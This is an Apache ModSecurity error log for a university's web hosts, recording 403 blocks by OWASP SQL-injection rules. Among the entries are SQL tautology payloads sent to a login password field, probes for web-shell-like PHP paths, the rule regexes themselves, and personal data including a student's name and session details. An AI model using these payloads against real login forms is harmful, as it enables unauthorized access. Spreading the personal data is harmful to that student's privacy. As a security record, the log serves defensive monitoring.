[Mon Aug 28 17:54:55.233264 2023] [:error] [pid 48971] [client 114.122.101.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:5:{s:10:\\x22session_id\\x22;s:32:\\x227e1f9cb6fd2f23b7c827cc0dc70294bd\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22114.122.101.3\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693220095\\x22;s:20:\\x22login_resunlaprivate\\x22;s:1:\\x220\\x22;}8449092b28801ef34dec568188d5a43d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "p.unla.ac.id"] [uri "/auth/login"] [unique_id "ZOx8-8Co-f0AAL9LJpUAAAAD"]
[Mon Aug 28 17:54:58.820405 2023] [:error] [pid 48971] [client 114.122.101.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:5:{s:10:\\x22session_id\\x22;s:32:\\x227e1f9cb6fd2f23b7c827cc0dc70294bd\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22114.122.101.3\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693220095\\x22;s:20:\\x22login_resunlaprivate\\x22;s:1:\\x220\\x22;}8449092b28801ef34dec568188d5a43d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "p.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOx9AsCo-f0AAL9LJpYAAAAD"]
[Mon Aug 28 17:54:58.869064 2023] [:error] [pid 48971] [client 114.122.101.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:5:{s:10:\\x22session_id\\x22;s:32:\\x227e1f9cb6fd2f23b7c827cc0dc70294bd\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22114.122.101.3\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693220095\\x22;s:20:\\x22login_resunlaprivate\\x22;s:1:\\x220\\x22;}8449092b28801ef34dec568188d5a43d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "p.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOx9AsCo-f0AAL9LJpcAAAAD"]
[Mon Aug 28 17:55:08.247107 2023] [:error] [pid 49123] [client 114.122.101.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:5:{s:10:\\x22session_id\\x22;s:32:\\x227e1f9cb6fd2f23b7c827cc0dc70294bd\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22114.122.101.3\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693220095\\x22;s:20:\\x22login_resunlaprivate\\x22;s:1:\\x220\\x22;}8449092b28801ef34dec568188d5a43d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "p.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOx9DMCo-f0AAL-jnLkAAAAV"]
[Mon Aug 28 18:07:45.123652 2023] [:error] [pid 49205] [client 103.119.98.179] ModSecurity: Rule 7fe1c6e3f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/template/alfav.php"] [unique_id "ZOyAAcCo-f0AAMA1IJIAAAAI"]
[Mon Aug 28 18:07:45.227362 2023] [:error] [pid 49205] [client 103.119.98.179] ModSecurity: Rule 7fe1c6e3f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOyAAcCo-f0AAMA1IJMAAAAI"]
[Mon Aug 28 18:07:54.150310 2023] [:error] [pid 49260] [client 103.119.98.179] ModSecurity: Rule 7fe1c6e3f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/-/0xNix1337.php"] [unique_id "ZOyACsCo-f0AAMBsQuUAAAAL"]
[Mon Aug 28 18:08:02.838343 2023] [:error] [pid 49205] [client 103.119.98.179] ModSecurity: Rule 7fe1c6e3f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/-/0xNix.php"] [unique_id "ZOyAEsCo-f0AAMA1IJQAAAAI"]
[Mon Aug 28 18:08:09.322797 2023] [:error] [pid 49258] [client 103.119.98.179] ModSecurity: Rule 7fe1c6e3f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/-/0xNix.php"] [unique_id "ZOyAGcCo-f0AAMBqw6cAAAAH"]
[Mon Aug 28 18:08:12.198893 2023] [:error] [pid 49258] [client 103.119.98.179] ModSecurity: Rule 7fe1c6e3f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/-"] [unique_id "ZOyAHMCo-f0AAMBqw6gAAAAH"]
[Mon Aug 28 19:21:16.066689 2023] [:error] [pid 50569] [client 60.253.107.226] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "40.77.167.63_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_library/jnsbuku_form.js"] [unique_id "ZOyRPMCo-f0AAMWJ4JIAAAAS"]
[Mon Aug 28 19:21:16.066690 2023] [:error] [pid 50566] [client 60.253.107.226] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "40.77.167.63_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_library/opac_form.js"] [unique_id "ZOyRPMCo-f0AAMWGa1kAAAAL"]
[Mon Aug 28 19:21:16.066744 2023] [:error] [pid 50492] [client 116.68.168.26] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "40.77.167.63_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/dashboard/dashboard_rektor.js"] [unique_id "ZOyRPMCo-f0AAMU8IIoAAAAN"]
[Mon Aug 28 19:21:16.079448 2023] [:error] [pid 50560] [client 60.253.107.226] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "40.77.167.63_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_library/jnsbuku.js"] [unique_id "ZOyRPMCo-f0AAMWA18UAAAAO"]
[Mon Aug 28 19:30:44.208161 2023] [:error] [pid 50787] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:columns[0][data]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:columns[0][data]: columns[0][data]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "tpa-online.unla.ac.id"] [uri "/jurusan/data"] [unique_id "ZOyTdMCo-f0AAMZjgGkAAAAG"]
[Mon Aug 28 19:31:40.521397 2023] [:error] [pid 50785] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:columns[0][data]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:columns[0][data]: columns[0][data]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "tpa-online.unla.ac.id"] [uri "/kelas/data"] [unique_id "ZOyTrMCo-f0AAMZhcZwAAAAR"]
[Mon Aug 28 19:34:20.989016 2023] [:error] [pid 50801] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:columns[0][data]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:columns[0][data]: columns[0][data]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "tpa-online.unla.ac.id"] [uri "/jurusan/data"] [unique_id "ZOyUTMCo-f0AAMZxzREAAAAT"]
[Mon Aug 28 19:35:24.407610 2023] [:error] [pid 50849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:columns[0][data]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:columns[0][data]: columns[0][data]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "tpa-online.unla.ac.id"] [uri "/jurusan/data"] [unique_id "ZOyUjMCo-f0AAMahrNUAAAAX"]
[Mon Aug 28 19:37:52.998416 2023] [:error] [pid 50782] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:columns[0][data]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:columns[0][data]: columns[0][data]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "tpa-online.unla.ac.id"] [uri "/jurusan/data"] [unique_id "ZOyVIMCo-f0AAMZeKogAAAAK"]
[Mon Aug 28 19:38:04.655652 2023] [:error] [pid 50784] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:columns[0][data]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:columns[0][data]: columns[0][data]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "tpa-online.unla.ac.id"] [uri "/jurusan/data"] [unique_id "ZOyVLMCo-f0AAMZg4QEAAAAQ"]
[Mon Aug 28 19:46:31.457328 2023] [:error] [pid 50978] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:columns[0][data]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:columns[0][data]: columns[0][data]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "tpa-online.unla.ac.id"] [uri "/jurusan/data"] [unique_id "ZOyXJ8Co-f0AAMciLIAAAAAO"]
[Mon Aug 28 19:47:36.959205 2023] [:error] [pid 50860] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:columns[0][data]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:columns[0][data]: columns[0][data]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "tpa-online.unla.ac.id"] [uri "/jurusan/data"] [unique_id "ZOyXaMCo-f0AAMasAFMAAAAM"]
[Mon Aug 28 20:15:11.932935 2023] [:error] [pid 51585] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: ' 1=1 found within ARGS:password: 0' 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "tpa-online.unla.ac.id"] [uri "/auth/cek_login"] [unique_id "ZOyd38Co-f0AAMmBgSAAAAAB"]
[Mon Aug 28 20:19:20.568797 2023] [:error] [pid 51617] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0=0 found within ARGS:password: 0=0 \\x22 1=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "tpa-online.unla.ac.id"] [uri "/auth/cek_login"] [unique_id "ZOye2MCo-f0AAMmhAeIAAAAO"]
[Mon Aug 28 20:20:02.348973 2023] [:error] [pid 51655] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search[value]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search[value]: 0\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "tpa-online.unla.ac.id"] [uri "/kelas/data"] [unique_id "ZOyfAsCo-f0AAMnHBb8AAAAL"]
[Mon Aug 28 23:54:44.501903 2023] [:error] [pid 55743] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOzRVMCo-f0AANm-L18AAAAC"]
[Mon Aug 28 23:54:45.746903 2023] [:error] [pid 55743] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzRVcCo-f0AANm-L2AAAAAC"]
[Mon Aug 28 23:54:46.312141 2023] [:error] [pid 55748] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22d27e650aaefb4b1f8d561ff138450841\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22203.176.176.235\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241624\\x22;}32ddf272f44aead720f0d6d1f8b1ec86"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOzRVsCo-f0AANnEOjMAAAAB"]
[Mon Aug 28 23:54:52.643362 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOzRXMCo-f0AANnDyPAAAAAD"]
